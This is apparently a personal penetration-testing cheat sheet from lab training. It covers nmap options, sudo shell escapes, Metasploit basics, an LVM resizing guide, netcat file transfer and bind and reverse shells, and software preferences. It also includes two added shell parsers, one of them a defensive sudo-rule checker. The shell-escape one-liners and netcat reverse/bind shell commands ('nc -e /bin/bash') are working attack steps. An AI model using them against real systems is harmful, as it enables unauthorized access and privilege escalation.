Here are the lists of options I mostly used during my training on HTB/VulnHub, and soon on the OSCP labs.

NMAP

Identify

  • -O : the OS
  • -sL : the services
  • -A : Detect OS & Services
  • -sV : Standard service Detection
  • -sV --version-intensity 9 : most aggressive service detection (intensity goes from 0 to 9, 7 by default)
  • -sC : script scan using the default set of NSE scripts (some of them are considered intrusive)


Port selection

  • -p 22
  • -p 1-150
  • -F : 100 most common (Quick & Dirty)
  • -p- : all 65535 ports

Port scan types

  • -sT : TCP Connect Scan (Establish the connection to the 1000 common ports)
  • -sS : TCP SYN scan (default)
  • -sU -p : UDP Ports
  • -Pn : Consider host up
  • -F : only 100 most common
  • -sN : Null scan. No flags set in the TCP header; useful to make a hidden firewall reveal itself


Templates

  • -T0 : paranoid, IDS evasion, ports scanned one at a time, 5 min between each probe
  • -T1 : sneaky, IDS evasion, 15 sec between each probe
  • -T2 : polite, slows down the scan to use less bandwidth & resources, 0.4 sec between each probe
  • -T3 : normal, default mode
  • -T4 : aggressive, assumes we are on a fast and reliable network
  • -T5 : insane, sacrifices accuracy for speed


Other useful options

  • -oA : save the output in all formats at once (normal txt, grep-able, XML)
  • -oG : save only in the grep-able format
  • -iL : read the targets from a file (ex. a list of IP addresses)
  • --badsum : send packets with an incorrect checksum; real hosts drop them, but a firewall that does not verify checksums still answers, which helps to fingerprint it


Classic scan

  • nmap -sC -sV -oA nmap/output-file <TARGET-IP> -p-
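Added example (not from the original notes): a POSIX sh/awk parser that turns the grep-able output of -oG (or the .gnmap file written by -oA) into one line per open port, handy for keeping a service inventory or diffing two scans of the same box. The scan output below is constructed, not a real scan.

```shell
#!/bin/sh
# Parse nmap grepable output (-oG, or the .gnmap file written by -oA) into
# one "ip port/proto service version" line per OPEN port.

# Constructed sample of a -sV -oG scan (not real hosts). Tabs separate the
# fields of a Host: line, ", " separates the entries inside the Ports: field.
sample_og() {
    printf '%s\n' '# Nmap 7.80 scan initiated as: nmap -sC -sV -oG nmap/output-file -p- 10.0.0.5'
    printf 'Host: 10.0.0.5 ()\tStatus: Up\n'
    printf 'Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1 Debian 10/, 80/open/tcp//http//nginx 1.14.2/, 3306/filtered/tcp//mysql///\tIgnored State: closed (65532)\n'
    printf 'Host: 10.0.0.6 (fileserver)\tPorts: 445/open/tcp//microsoft-ds//Samba smbd 4.9.5/\n'
    printf '# Nmap done -- 2 IP addresses (2 hosts up) scanned in 300.00 seconds\n'
}

# Reads -oG text on stdin. Each port entry has the layout
# port/state/proto/owner/service/rpcinfo/version/ (version is filled by -sV).
open_ports() {
    awk -F'\t' '
        /^Host: / {
            ip = $1
            sub(/^Host: /, "", ip); sub(/ .*/, "", ip)      # keep only the address
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                ports = $i; sub(/^Ports: /, "", ports)
                n = split(ports, p, ", ")
                for (j = 1; j <= n; j++) {
                    split(p[j], f, "/")
                    if (f[2] == "open")
                        printf "%s %s/%s %s %s\n", ip, f[1], f[3], f[5], f[7]
                }
            }
        }'
}

# Usage on a real scan: open_ports < nmap/output-file.gnmap
sample_og | open_ports
```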


NSE Scripts

NSE scripts run after the port scan & OS detection are finished. They are particularly useful to automate nmap scans (they are written in the Lua language).

  • nmap -p80 TARGET-IP --script="http-*" : scan port 80, then run every NSE script whose name begins with "http-" against this host
  • nmap --script-updatedb : keep the NSE script database up to date
  • nmap --script "broadcast-*" TARGET-LAN : run the NSE broadcast scripts against each host discovered


Shell escape

TO DO: Insert here some intro/explanation, we are not savage people.

  • awk: awk 'BEGIN {system("/bin/bash")}'
  • bash: /bin/sh -i
  • find: find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
  • less/man/more: !bash
  • lua: os.execute('/bin/sh')
  • nmap: !sh (inside nmap --interactive), or through a script:
      echo "os.execute('/bin/sh')" > exploit.nse
      sudo nmap --script=exploit.nse
  • perl: perl -e 'exec "/bin/bash";'
  • python: python -c 'import pty; pty.spawn("/bin/bash")'
  • vi/vim: :!bash, or :set shell=/bin/bash followed by :shell
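The hardening counterpart of the list above, as an added example (not from the original notes): a POSIX sh/awk check that reads the text printed by "sudo -l" and flags every rule granting one of the binaries listed here, so the rule can be tightened on the hosts you administer. The sudo -l output is constructed; the ESCAPABLE list is an assumption you should extend to your own baseline.

```shell
#!/bin/sh
# Flag sudo rules that hand out a binary with a known shell escape, so the
# rule can be tightened (another binary, NOEXEC, or removal). Reads the text
# printed by "sudo -l" (or "sudo -l -U user") on stdin.

# Constructed sample of "sudo -l" output; not from a real host.
sample_sudo_l() {
    printf '%s\n' \
        'User alice may run the following commands on host1:' \
        '    (root) NOPASSWD: /usr/bin/find' \
        '    (root) /usr/bin/vim, /usr/sbin/nmap' \
        '    (root) /usr/bin/systemctl restart nginx' \
        '    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/app/run.py'
}

# Binaries from the shell-escape list on this page (assumed baseline).
# Trailing version digits are stripped before matching, so python3 -> python.
ESCAPABLE="awk find less man more lua nmap perl python vi vim"

flag_escapes() {
    # stdout: "<binary><TAB><rule as printed by sudo -l>" for every match
    awk -v list="$ESCAPABLE" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) bad[a[i]] = 1 }
        /^ *\(/ {
            rule = $0
            sub(/^ *\([^)]*\) */, "", rule)          # drop "(root) " / "(ALL : ALL) "
            sub(/^([A-Z]+: *)+/, "", rule)           # drop NOPASSWD:, SETENV:, ...
            m = split(rule, cmds, /, */)             # several commands per line
            for (j = 1; j <= m; j++) {
                split(cmds[j], w, " "); bin = w[1]   # first word is the path
                sub(/.*\//, "", bin)                 # basename
                sub(/[0-9.]+$/, "", bin)             # python3 -> python
                if (bin in bad) printf "%s\t%s\n", bin, cmds[j]
            }
        }'
}

# Usage on a real host: sudo -l -U alice | flag_escapes
sample_sudo_l | flag_escapes
```

A rule that pins the arguments (the python3 line) is still flagged: sudo enforces the exact arguments, so what matters there is whether the user can edit the script the rule runs.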


Metasploit

Launch metasploit (and directly load script)

sudo msfconsole -x "use auxiliary/scanner/mysql/mysql_login;"

Options

msf > show options
msf > show advanced
msf > show targets
msf > show payloads


Looking for specific exploit

Absolute path of an exploit file: /usr/share/exploitdb/xxxxxxx (the relative part is what searchsploit prints)

root@kali-anon:~# searchsploit docker
  DC/OS Marathon UI - Docker (Metasploit) | exploits/python/remote/42134.rb
  Docker 0.11 - VMM-Container Breakout    | exploits/linux/local/33808.c
  Docker Daemon - Local Privilege Escal.  | exploits/linux/local/40394.rb
  Docker Daemon - Unprotected TCP Socket  | exploits/linux/local/42356.txt
  Docker Daemon - Unprotected TCP Socket  | exploits/python/remote/42650.rb
  Rancher Server - Docker Daemon Code Exec| exploits/linux_x86-64/remote/42964.rb


Running exploits

msf > run
msf > exploit


Modules

The tree of Metasploit modules is organized as follows:
- Payloads: code that is left on the compromised system (listeners, rootkits, ...)
- Exploits: code that takes advantage of a vulnerability (and delivers the payload)
- Post: modules for post-exploitation on compromised systems
- Nops: no-op sleds used in buffer-overflow (BOF) payloads
- Auxiliary: everything that does not fit in the other categories (fuzzers, scanners, DoS, ...)
- Encoders: modules that encode payloads to get past AV

Searching

msf > search type:exploit platform:linux


LVM GUIDE

This is a complete guide to extend an existing 250GB LVM partition and resize it to 500GB. Obviously, only for Linux systems.
The procedure details the partition creation, its configuration and the LVM extension.

It also covers 2 exceptions (a partition larger than 2TB, and a VMware extension beyond 16TB).

Partition creation

Fdisk

fdisk /dev/sdb
    n    (for new)
    p    (for primary)
    1    (partition number)

Set the type

t     (for setting a partition type)
    1    (select the correct partition)
    L    (get the list)
    8e  (select LVM)
    p    (verify)
    w   (write configuration)

Configuration

Initialize the partition

pvcreate /dev/sdb1
pvdisplay => physical volume information
pvscan => scan all block devices for LVM physical volumes

Create the Volume Group

vgcreate vg_backup /dev/sdb1

Create the Logical Volume

lvcreate --name lv_backup -l 100%FREE vg_backup
lvdisplay
...

Format the new partition

mkfs.ext4 /dev/vg_backup/lv_backup

Create mount point

mkdir /backup
mount /dev/vg_backup/lv_backup /backup
#(add an entry in /etc/fstab so the mount survives a reboot)

Verify

df -h
  Device     Start   End        Sectors   Id  Type
  /dev/sda2  821248  167772159  83475456  8e  Linux LVM

OLD
  Device     Boot  Start       End   Sectors  Size Id Type
  /dev/sda1  *      2048    499711    497664  243M 83 Linux
  /dev/sda2       501758 125827071 125325314 59.8G  5 Extended
  /dev/sda5       501760 125827071 125325312 59.8G 8e Linux LVM

NEW
 First sector (499712-230686719, default 499712): 
  Device     Boot     Start       End   Sectors  Size Id Type
  /dev/sda1  *         2048    499711    497664  243M 83 Linux
  /dev/sda2          501758 125827071 125325314 59.8G  5 Extended
  /dev/sda3       125827072 230686719 104859648   50G 8e Linux LVM
  /dev/sda5          501760 125827071 125325312 59.8G 8e Linux LVM

LVM extension

SCSI bus rescan

Add the needed space in the vSphere Client, then rescan the SCSI bus

echo '1' > /sys/class/scsi_disk/0\:0\:0\:0/device/rescan
or (adapt to the bus address of your device)
echo '1' > /sys/class/scsi_disk/2\:0\:1\:0/device/rescan

Modify the partition table

fdisk -l
fdisk /dev/sdb
    d    (delete the old partition; the data stays on disk as long as the new partition starts at the same sector)
    1
    n    (create a new one that begins at the same first sector, but ends at the new end of the disk)
    p    (primary, like the first one)
    t
    1
    8e   (specify the LVM type once more)
    w    (write the configuration)

Resize the Physical Volume

pvresize /dev/sdb1 
  Physical volume "/dev/sdb1" changed
  1 physical volume(s) resized / 0 physical volume(s) not resized
init 6    (reboot so the kernel reloads the partition table)
pvresize /dev/sdb1 
partprobe -s
pvdisplay
    PV Name               /dev/sdb1
    VG Name               vg_backup
    PV Size               500.00 GiB / not usable 2.00 MiB

Resize to the full size

lvextend -l +100%FREE /dev/vg_backup/lv_backup
lvdisplay |grep Size
 LV Size                500.00 GiB

Check the old size before modifying

df -h|grep mapper
    /dev/mapper/vg1-lv001             18G  1.8G   15G  11% /
    /dev/mapper/vg_backup-lv_backup  246G   61M  234G   1% /backup

Resize the filesystem on the Logical Volume

resize2fs /dev/vg_backup/lv_backup

Check the new size

df -h |grep mapper
/dev/mapper/vg1-lv001             18G  1.8G   15G  11% /
/dev/mapper/vg_backup-lv_backup  493G   70M  470G   1% /backup

Exception n°1 (>=2TB partition)

For a partition larger than 2TB we cannot use fdisk (the MBR partition table it writes stops at 2TB);
use parted with a GPT label instead

parted /dev/sdb
mklabel gpt
print free
mkpart data1 ext4 17.4kb 4398GB

print free
  Number  Start   End     Size    File system  Name   Flags
  1      17.4kB  4398GB  4398GB               data1

Set LVM flag

set 1 lvm on
print     (or just "p")

Create the physical volume

pvcreate  /dev/sdb1

I did this for 4 disks, sdb sdc sdd sde (4x4TB)

vgcreate vg_shares /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1
lvcreate --name lv_shares -l 100%FREE vg_shares

Exception n°2 (VMware VM > 16TB)

VMware cannot add a new disk larger than 16TB to a VM through the vSphere Client.
Through the ESX command line you can get the VM id

[root@localhost:~] vim-cmd vmsvc/getallvms
  Vmid       Name                            File                         Guest OS      Version   Annotation
  1      office-backup   [datastore1] elkarbackup/elkarbackup.vmx       centos64Guest   vmx-11
  2      office-shares   [datastore1] office-shares/office-shares.vmx   centos64Guest   vmx-11
#<here the ID we need to modify is n°2>

vim-cmd vmsvc/device.diskadd 2 18000000 scsi0 2 datastore1
  device.diskadd => add a disk to the VM
  2 => VM id
  18000000 => size in MB, i.e. 18TB
  scsi0 => first SCSI bus
  2 => second position on the bus, there is already a disk in the first position
  datastore1 => name of the datastore


NETCAT

Connect

Manually to a service

nc -v TARGET-IP PORT

Simple channel

srv: nc -nvlp PORT
cli: nc -nv TARGET-IP PORT

File transfer

receiver side: nc -nvlp PORT > file.zip
sender side: nc -nv TARGET-IP PORT < file.zip

Remote shell

Different types

There are 2 types of remote shell:
- BIND shell: the shell is bound to a specific TCP port on the remote host, and the client connects to it
- REVERSE shell: the client opens a listening socket, and the remote host sends a shell to this socket

Reverse shell

Allow an incoming connection on PORT to execute cmd.exe remotely

listener side: nc -nvlp PORT
sender side: nc -nv TARGET-IP PORT -e cmd.exe
or
sender side: nc -nv TARGET-IP PORT -e /bin/bash

Bind shell

linux srv: nc -nlv PORT -e /bin/bash
or
win srv: nc -nlv PORT -e cmd.exe
cli: nc -nv TARGET-IP PORT


BEST TECHNICAL USAGE (for daily tasks)

My daily software usage

  • EMAIL: Protonmail (and PAY to help keep the service running)
  • CLOUD: NextCloud (self-hosted)
  • PASSWORD: KeePass2, install it through your package manager & set a very strong password + key file
  • TERMINAL: Tmux, like a real man!
  • NOTES: CherryTree (or KeepNote)
  • BROWSER: Firefox and/or Tor
  • VPN: NordVPN; merge TCP + UDP VPN via a script when doing sensitive operations
  • OFFICE: LibreOffice
  • TALK: IRC (BitchX) & Mattermost
  • VM: VirtualBox with 3 boxes (1 Debian sandbox + 1 Win10 + 1 Kali)
  • GPS: OpenStreetMaps, only for simple mapping & location. For directions, visualization and traffic I always use Google Maps (offline)
  • Phone: LineageOS + the VPN must be up all the time!
  • Organization: Kanban integrated into NextCloud


Wifi
For obvious security reasons, I will not detail all of these steps ...

  • Hidden SSID
  • Filtering by MAC address + strong password + manual addition only by me
  • Use WPA2 Enterprise security
  • Rogue AP detection on the server
  • Test & reduce the Wifi signal range
  • Email when an unknown address is seen
  • No Wifi for guests at home (people must know that you are a fundamentalist)